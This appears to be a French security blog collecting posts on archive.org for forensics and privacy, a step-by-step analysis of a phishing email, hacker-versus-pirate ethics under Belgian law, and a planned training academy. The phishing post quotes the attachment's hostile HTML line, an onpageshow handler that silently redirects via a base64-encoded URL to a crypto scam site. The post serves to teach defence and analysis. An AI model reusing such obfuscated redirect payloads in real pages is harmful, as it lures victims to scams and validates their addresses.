Outils: archive.org

J’aimerais vous présenter l’outil archive.org, outil précieux pour faire de l’investigation (forensic).

J’ai utilisé cet outil dans un précédent article pour analyser une page web qui avait disparu. En effet, depuis 25 ans, archive.org s’est donné pour mission d’archiver régulièrement le contenu de plus de 600 milliards de pages web. Toutes ces archives sont librement consultables et les archives restent disponibles pendant 20 ans (cette limite est très théorique, j’ai trouvé des pages de 1996…)

L’outil a un côté fun, puisqu’il permet de remonter le temps et de découvrir la face peu glorieuse des sites de la fin du siècle précédent. De quoi retrouver la page de sa promo étudiante ou observer les premiers pas de facebook ou youtube…

lesoire.be (1998), facebook.com (2007), RTBF.be (1997)

Au-delà de l’aspect ludique, la justice reconnaît maintenant les informations retrouvées via archive.org comme preuve (datée) de publication, ce qui permet de trancher dans des conflits de plagiat par exemple.

D’un autre côté, archive.org est parfois utilisé dans le cadre d’investigations. Il est par exemple possible de trouver dans d’anciennes versions d’un site web des informations sur d’anciens membres, d’anciennes activités, d’anciens liens avec d’autres sites etc. Récemment, un journaliste d’investigation a pu relier un site antivaxx à son auteur véritable en retrouvant une redirection vers cet auteur dans les toutes premières versions du site.

Et enfin, archive.org peut être potentiellement utilisé par les pirates pour récolter de l’information sur leurs cibles (en remontant aux versions pré-GDPR, il est encore possible de trouver énormément d’informations personelles sur les pages web de sociétés…)

Et la vie privée dans tout ça?

Les outils comme archive.org renforcent encore l’adage « sur Internet un jour, sur Internet pour toujours ». Ce qui signifie que votre blog de jeunesse, mettant en scène votre vie à grands coups de photos de guindaille et poèmes emos, votre site est peut-être toujours là, ses pages compromettantes archivées sur archive.org…

Alors que faire, si vous pensez que ces pages du début du siècle risquent de compromettre votre carrière politique prometteuse ou vos chances de trouver l’âme sœur? Il n’existe hélas pas de moyen facile ni automatique d’effacer ces traces du passé. Il faut prendre contact avec le site d’archive via mail en indiquant les pages à supprimer. Vous pouvez trouver sur Internet (ou sur archive.org si ce site a disparu…) des pages d’explications comme celle-ci.

Petit jeu de mise en application

Il y a quelques années, j’ai co-fondé le site nainternaute.com, aujourd’hui disparu. Pouvez-vous me dire en commentaire combien de membres étaient encore actifs sur ce site juste avant de sa fermeture temporaire le 21/02/2006 ? (à l’époque en tout cas nous pensions naïvement que c’était temporaire). Le premier qui publie la réponse a gagné 😉

————————-

Sources:

Utilisation de archive.org en justice: https://www.legavox.fr/blog/maitre-anthony-bem/validite-preuve-diffusion-contenu-internet-27221.htm

Analyse d’un mail de fishing

mail de fishing

Il y a quelques jours, j’ai reçu un email pour le mois étrange, dont le texte est un ensemble de caractères aléatoires, accompagné d’une pièce jointe.
Comme je suis un peu parano pour tout ce qui concerne la sécurité informatique, je n’ai évidemment pas ouvert la pièce jointe. Mais d’autre part j’aime comprendre comment les choses fonctionnent donc il fallait que j’aille analyser tout cela plus profondément 😉

Ceci est un exemple de Forensic (investigation), une des disciplines du hacker, dans laquelle le hacker analyse des malware pour tenter d’en découvrir la provenance et contrer la menace.

STEP 0: sécurité d’abord!
Ouvrir une pièce jointe de provenance inconnue est évidemment une très très mauvaise idée. Toutes les opérations décrites ci-dessous ont été réalisées sur une machine virtuelle « jetable » ne contenant aucune information personnelle.

STEP 1: analyse de la pièce jointe.
La pièce jointe est une page HTML. L’ouvrir dans un navigateur est risqué: cette page peut contenir du script qui va s’exécuter sur mon navigateur. Ce script peut par exemple rediriger vers un site dangereux, tenter de me voler des information par exemple via un faux formulaire de login facebook ou autre, exploiter une faille de mon navigateur pour avoir accès à des informations confidentielles etc. j’ai donc téléchargé la page en question et je l’ai ouverte avec un éditeur de texte. Voici son contenu:

<frameset onpageshow="document.location.href=window.atob('aHR0cHM6Ly9tdXNrLmJ0Y2RvbmF0dmVyLnNpdGUvPz');">

La page contient effectivement un morceau de script qui s’exécute au démarrage. document.location.href= »… » est une instruction qui va me rediriger vers un site internet. L’adresse de ce site est codée en base64 (décodé via la fonction atob) : « musk.donatver.site/?****** »
Ce que j’ai remplacé par de étoiles est en réalité un identifiant qui permet probablement d’associer ma visite à mon adresse email, et ainsi confirmer que mon email est valide et peut être réutilisée pour d’autres scams…

STEP2: analyse du site web
j’ai donc visité le site en question, en prenant soin de supprimer mon identifiant. La visite tourne court, le site n’est plus accessible. Il est néanmoins possible, grâce à web.archive, de retrouver un snapshot du site pris il y a 8 jours. Et là je ne suis pas déçu: Elon Musk me propose de partager sa fortune à raison de 0.099 bitcoins par jour! Si c’est trop beau pour être vrai, ce n’est probablement pas vrai 😉 L’accès au site via web.archive ne permet pas une analyse poussée, mais néanmoins une rapide lecture de la source permet d’avoir une idée sur l’origine du scam: la page utilise yandex.ru comme outil de statistique, ce qui pointe vers nos amis de l’est…

Merci Elon!!!

D’après un certain nombre d’infos glanées sur des forums, cette offre alléchante doit obligatoirement être précédée d’un petit versement préalable, bien réel celui-là…

STEP3: analyse du domaine
même si le site n’est plus accessible, une recherche sur whois nous permet de voir que le domaine à été enregistré via un fournisseur russe établi à Moscou. Le nom de domaine même (donatver) pourrait faire référence à « донат » (donation)

CONCLUSION: un mail de fishing assez classique, promettant monts et merveilles pour soutirer de l’argent et des informations personelles. Le seul fait de cliquer donne déjà de l’info aux scammers (validation de l’adresse email, association à une adresse IP,…) On le dit souvent, mais il est bon de le répéter: ne cliquez pas aveuglément sur les pièce jointes, et ne croyez pas tout ce qu’on vous propose 😉 Conclusion supplémentaire pour moi: ne pas attendre trop longtemps avant de faire une analyse, les sites comme ça disparaissent vite 😉

Hacker ou Pirate?

hacker ou Pirate? image libre de droit pixabay.com

Quelle est la différence entre un hacker et un pirate? Après tout, ils utilisent en gros les mêmes outils et les mêmes techniques, alors qu’est-ce qui les différencie?

Pour moi, les différences principales sont les suivantes:

INTENTION: là où le hacker cherche à satisfaire sa curiosité et sa soif de connaissance, le pirate a un but offensif (vol, destruction, chantage,…), qu’il soit motivé par l’appât du gain ou par militantisme.

PERMISSION: le hacker ne va s’attaquer qu’a des infrastructures pour lesquelles il a reçu une permission explicite. Cette permission peut être obtenue dans des cadres bien spécifiques:

  • des sites spécialisés (CTF, challenges de sécurité,…) dont les conditions générales indiquent quelles parties de l’infrastructure sont explicitement destinées à être « crackées ».
  • des événements de « bug bounty » organisés par des fournisseurs de solution comme Google, dans lesquels les participants sont invités explicitement à chercher le failles du système développé.
  • du « pen testing », activité professionnelle dans laquelle une entreprise engage un hacker pour tester la sécurité de son entreprise. Le scope du test est alors défini dans le contrat signé par l’entreprise et le hacker

En dehors de ces permissions, toute activité de hacking est considérée comme illégale. J’insiste donc sur le fait que les techniques apprises à la geek(h)ac(k)ademy ne peuvent être utilisées que dans les cas cités ci-dessus.

L’article 550bis du code pénal belge précise que le simple accès à un système informatique de manière non autorisée constitue déjà une infraction punissable d’une peine de prison de 3 mois à un an, même sans intention frauduleuse. Le seul fait de consulter des données auxquelles l’on n’est pas sensé avoir accès est assimilé à un vol de données.

Geekhackademy en quelques Questions

Quoi? Geek(h)ac(k)ademy (en construction) proposera des modules d’entraînement et de coaching pour préparer ses membres à des challenges informatiques de plus en plus compliqués, liés à la sécurité informatique: cryptographie, web security, SQLI, stéganographie, …

Pourquoi? pour le fun, pour apprendre les bases de la programmation, pour comprendre comment la sécurité fonctionne,…

Pour qui? pour toute personne intéressée et motivée, dotée d’une grande curiosité. Pas de pré-requis nécessaire, à part avoir accès à un ordinateur relié à l’internet. Une compréhension passive de l’anglais peut être utile.

Quand? il reste encore pas mal de travail afin de peaufiner le concept, je vise janvier 2022 pour le lancement officiel. Mais il y aura probablement des essais avant 2022 😉